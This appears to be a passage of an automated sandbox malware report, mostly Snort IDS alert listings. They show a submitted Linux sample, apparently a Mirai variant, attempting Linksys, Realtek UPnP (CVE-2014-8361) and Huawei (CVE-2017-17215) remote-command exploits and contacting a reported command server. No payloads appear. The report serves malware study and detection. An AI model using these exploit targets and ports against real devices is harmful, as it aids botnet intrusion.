    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.221.136.7740648802027121 05/14/22-02:04:43.322465
    SID:2027121
    Source Port:40648
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.241.19859824802027121 05/14/22-02:04:43.339295
    SID:2027121
    Source Port:59824
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.236.17850606802027121 05/14/22-02:05:45.541757
    SID:2027121
    Source Port:50606
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.148.137.22246540802027121 05/14/22-02:04:40.840279
    SID:2027121
    Source Port:46540
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.138.14732984802027121 05/14/22-02:05:27.261197
    SID:2027121
    Source Port:32984
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.211.221.12139408802027121 05/14/22-02:04:21.756854
    SID:2027121
    Source Port:39408
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.226.220.15637282802027121 05/14/22-02:05:04.229140
    SID:2027121
    Source Port:37282
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.148.139.3154776802027121 05/14/22-02:04:50.437562
    SID:2027121
    Source Port:54776
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.31.6.11359422802027121 05/14/22-02:04:58.535677
    SID:2027121
    Source Port:59422
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.148.49.4251404802027121 05/14/22-02:04:48.007218
    SID:2027121
    Source Port:51404
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.99.101.20254734802027121 05/14/22-02:04:01.022090
    SID:2027121
    Source Port:54734
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.50.23143836555552027153 05/14/22-02:05:41.244057
    SID:2027153
    Source Port:43836
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.202.226.21658762802027121 05/14/22-02:04:32.259524
    SID:2027121
    Source Port:58762
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.98.13860678555552027153 05/14/22-02:04:50.716191
    SID:2027153
    Source Port:60678
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.50.6848506555552027153 05/14/22-02:04:13.394170
    SID:2027153
    Source Port:48506
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.203.9147194555552027153 05/14/22-02:05:18.632714
    SID:2027153
    Source Port:47194
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.225.22251082555552027153 05/14/22-02:04:31.045044
    SID:2027153
    Source Port:51082
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.100.119.3360388802027121 05/14/22-02:04:55.076014
    SID:2027121
    Source Port:60388
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.31.225.15836930802027121 05/14/22-02:04:58.537628
    SID:2027121
    Source Port:36930
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.219.212.2959618802027121 05/14/22-02:05:00.802432
    SID:2027121
    Source Port:59618
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.20.20039984555552027153 05/14/22-02:05:04.335191
    SID:2027153
    Source Port:39984
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.105.20040100555552027153 05/14/22-02:04:46.275094
    SID:2027153
    Source Port:40100
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.244.78.20139706528692027339 05/14/22-02:05:33.351834
    SID:2027339
    Source Port:39706
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.187.2835410555552027153 05/14/22-02:05:43.557994
    SID:2027153
    Source Port:35410
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2362.75.251.601461880802404338 05/14/22-02:04:37.171076
    SID:2404338
    Source Port:14618
    Destination Port:8080
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.190.18233602555552027153 05/14/22-02:05:24.831916
    SID:2027153
    Source Port:33602
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.147.251.7849714802027121 05/14/22-02:05:52.722920
    SID:2027121
    Source Port:49714
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.247.24048722802027121 05/14/22-02:03:53.362682
    SID:2027121
    Source Port:48722
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.249.57.15956710802027121 05/14/22-02:04:55.177371
    SID:2027121
    Source Port:56710
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.222.3448534802027121 05/14/22-02:04:57.385948
    SID:2027121
    Source Port:48534
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.1.10954966555552027153 05/14/22-02:05:45.960834
    SID:2027153
    Source Port:54966
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.79.138.16058010802027121 05/14/22-02:04:19.377128
    SID:2027121
    Source Port:58010
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.151.5035616802027121 05/14/22-02:04:48.074101
    SID:2027121
    Source Port:35616
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.181.22.15853724802027121 05/14/22-02:04:19.574675
    SID:2027121
    Source Port:53724
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.118.4260148555552027153 05/14/22-02:04:27.953786
    SID:2027153
    Source Port:60148
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.103.4058388555552027153 05/14/22-02:04:42.995871
    SID:2027153
    Source Port:58388
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.226.14.24139102528692027339 05/14/22-02:04:47.287454
    SID:2027339
    Source Port:39102
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.76.18357028555552027153 05/14/22-02:05:09.775735
    SID:2027153
    Source Port:57028
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.250.83.8654350528692027339 05/14/22-02:05:12.575619
    SID:2027339
    Source Port:54350
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.151.5035638802027121 05/14/22-02:04:49.195229
    SID:2027121
    Source Port:35638
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.56.213.15642384802027121 05/14/22-02:04:04.659452
    SID:2027121
    Source Port:42384
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.27.10660464802027121 05/14/22-02:04:45.496679
    SID:2027121
    Source Port:60464
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.226.83.13349816528692027339 05/14/22-02:05:07.440596
    SID:2027339
    Source Port:49816
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: VC3SWrksszVirustotal: Detection: 28%Perma Link

    Networking

    barindex
    Snort IDS alert for network traffic
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49884 -> 172.65.91.62:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44978 -> 172.65.149.227:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40066 -> 172.65.44.25:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48426 -> 95.101.189.56:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41910 -> 95.101.122.129:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42394 -> 88.247.4.15:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59472 -> 88.231.21.154:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37208 -> 172.65.116.243:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46324 -> 172.65.86.63:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55300 -> 172.65.174.20:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44186 -> 172.65.203.159:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43492 -> 172.65.33.108:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49930 -> 156.226.106.224:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59756 -> 156.226.51.26:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59740 -> 95.188.114.161:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54308 -> 95.223.191.176:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42428 -> 95.181.217.215:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39160 -> 156.245.35.206:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38414 -> 95.214.218.124:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49208 -> 172.65.176.123:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47458 -> 95.245.176.100:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44316 -> 156.238.52.233:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39672 -> 172.65.95.33:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48762 -> 172.65.43.96:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54200 -> 88.221.99.59:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36796 -> 95.159.14.92:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42422 -> 88.207.159.18:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55260 -> 88.195.2.157:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34116 -> 95.101.188.60:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40568 -> 172.65.85.56:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52764 -> 172.65.210.80:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38934 -> 172.245.113.111:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44862 -> 95.101.124.7:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53350 -> 95.129.189.11:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42484 -> 95.56.137.155:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55186 -> 95.34.6.150:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35486 -> 172.65.225.198:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47446 -> 172.65.86.14:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48506 -> 172.65.50.68:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56508 -> 172.65.147.240:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54672 -> 156.241.14.132:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60688 -> 88.100.202.197:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34182 -> 172.65.97.115:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51176 -> 172.65.94.144:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41560 -> 95.100.227.126:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56892 -> 88.247.119.147:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51822 -> 88.198.233.197:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50186 -> 95.110.188.58:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37008 -> 172.65.41.92:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48162 -> 172.65.164.17:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58936 -> 95.100.182.172:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56128 -> 172.65.253.163:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34996 -> 172.65.116.57:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50592 -> 95.166.126.94:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35584 -> 95.215.97.139:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58894 -> 88.83.121.221:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60148 -> 172.65.118.42:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56996 -> 172.65.247.44:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51872 -> 172.65.245.156:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58998 -> 156.252.26.142:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57076 -> 88.147.144.125:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51082 -> 172.65.225.222:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35894 -> 172.65.45.60:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49336 -> 172.65.246.225:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40248 -> 172.65.105.87:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36710 -> 88.221.250.120:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58762 -> 88.202.226.216:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45578 -> 95.101.10.131:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33638 -> 156.245.43.18:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51602 -> 172.65.97.200:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59028 -> 172.65.167.110:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40044 -> 172.65.123.78:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51778 -> 172.65.7.173:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55754 -> 172.65.40.184:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38726 -> 95.101.63.88:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47310 -> 95.180.140.24:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41400 -> 172.65.86.6:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39870 -> 156.230.24.148:52869
    Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.23:14618 -> 62.75.251.60:8080
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56878 -> 172.65.124.30:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50998 -> 156.254.55.121:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57156 -> 172.65.241.236:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39200 -> 156.224.15.170:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36672 -> 88.41.60.18:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36634 -> 88.221.247.20:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:58388 -> 172.65.103.40:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40648 -> 88.221.136.77:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57518 -> 88.221.190.76:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59824 -> 95.101.241.198:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60438 -> 88.221.185.192:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36224 -> 88.166.227.133:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38326 -> 172.65.204.101:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41020 -> 172.65.48.243:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42976 -> 95.217.234.237:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60968 -> 95.90.100.253:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34302 -> 95.209.159.210:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34272 -> 95.169.219.254:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52754 -> 172.65.207.224:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40100 -> 172.65.105.200:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42202 -> 98.159.33.130:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39102 -> 156.226.14.241:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47988 -> 156.226.79.26:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51404 -> 88.148.49.42:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49830 -> 95.217.74.29:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35616 -> 95.100.151.50:80
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40198 -> 197.234.59.176:37215
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60046 -> 88.221.43.153:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35638 -> 95.100.151.50:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52354 -> 172.65.205.160:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54776 -> 95.148.139.31:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60678 -> 172.65.98.138:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55326 -> 156.240.108.229:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46162 -> 156.245.46.107:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54556 -> 88.221.10.202:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35952 -> 88.99.214.46:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33926 -> 172.65.244.246:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38342 -> 88.201.64.5:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60388 -> 95.100.119.33:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35770 -> 95.100.151.50:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56710 -> 88.249.57.159:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44588 -> 88.221.227.223:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44754 -> 172.65.102.51:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56662 -> 172.65.67.90:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48486 -> 172.65.36.175:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47344 -> 172.65.241.93:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44670 -> 172.65.233.234:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60514 -> 95.252.227.99:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59250 -> 88.221.127.40:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36930 -> 88.31.225.158:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59618 -> 95.219.212.29:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47550 -> 156.254.86.103:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37726 -> 88.221.176.214:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50806 -> 95.217.171.189:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35510 -> 156.226.61.77:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42126 -> 172.65.170.206:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36050 -> 95.100.151.50:80
